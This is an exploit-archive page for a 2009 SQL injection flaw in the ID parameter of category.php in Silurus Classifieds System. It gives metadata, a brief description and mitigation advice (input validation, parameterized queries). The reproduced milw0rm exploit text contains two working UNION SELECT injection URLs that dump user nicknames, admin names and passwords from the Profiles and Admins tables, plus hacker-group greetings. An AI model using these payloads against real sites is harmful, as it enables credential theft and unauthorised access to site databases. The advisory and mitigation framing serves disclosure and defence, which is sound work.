Remote SQL Injection Vulnerability (category.php ID)

vendor:

Silurus Classifieds System

by:

Mr.SQL

9,3

CVSS

HIGH

SQL Injection

CWE

Product Name: Silurus Classifieds System

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Remote SQL Injection Vulnerability (category.php ID)

A vulnerability in Silurus Classifieds System allows an attacker to inject malicious SQL commands via the 'ID' parameter in the 'category.php' script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Successful exploitation may allow an attacker to gain access to the system and/or disclose sensitive information.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Additionally, the application should use parameterized queries to prevent SQL injection.

Source

Exploit-DB raw data:

###############################################################
#################### Viva IslaM Viva IslaM ####################
##
## Remote SQL Injection Vulnerability ( category.php ID )
##
## Silurus Classifieds System
##
## http://snowhall.com/silurus
##
###############################################################
###############################################################
##
## AuTh0r : Mr.SQL
##
## H0ME   : WwW.55a.NeT
##
## Email  : SQL@Hotmail.iT
##
########################
########################
##
## -[[: ExploiteS :]]-
##
## www.TraGeT.CoM/category.php?ID=1+and+1=0+UNION+SELECT+0,0,0,CONCAT_WS(0x3a3a,NickName,Password),0,0,0,0,0,0+FROM+Profiles--
## www.TraGeT.CoM/category.php?ID=1+and+1=0+UNION+SELECT+0,0,0,CONCAT_WS(0x3a3a,Name,Password),0,0,0,0,0,0+FROM+Admins--
##
########################
########################
 
Download ::  http://snowhall.com/downloads/silurus.php
 
#########################################################################################################
#########################################################################################################
                                  -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
                                        
:: HaCkEr_EGy :: Dark MaSTer  :: His0k4 :: User-Ma$keN :: ALwHeD :: Ghost Hacker :: MuslimS HaCkErS ::
#########################################################################################################
######################################################################################################### 

# milw0rm.com [2009-08-28]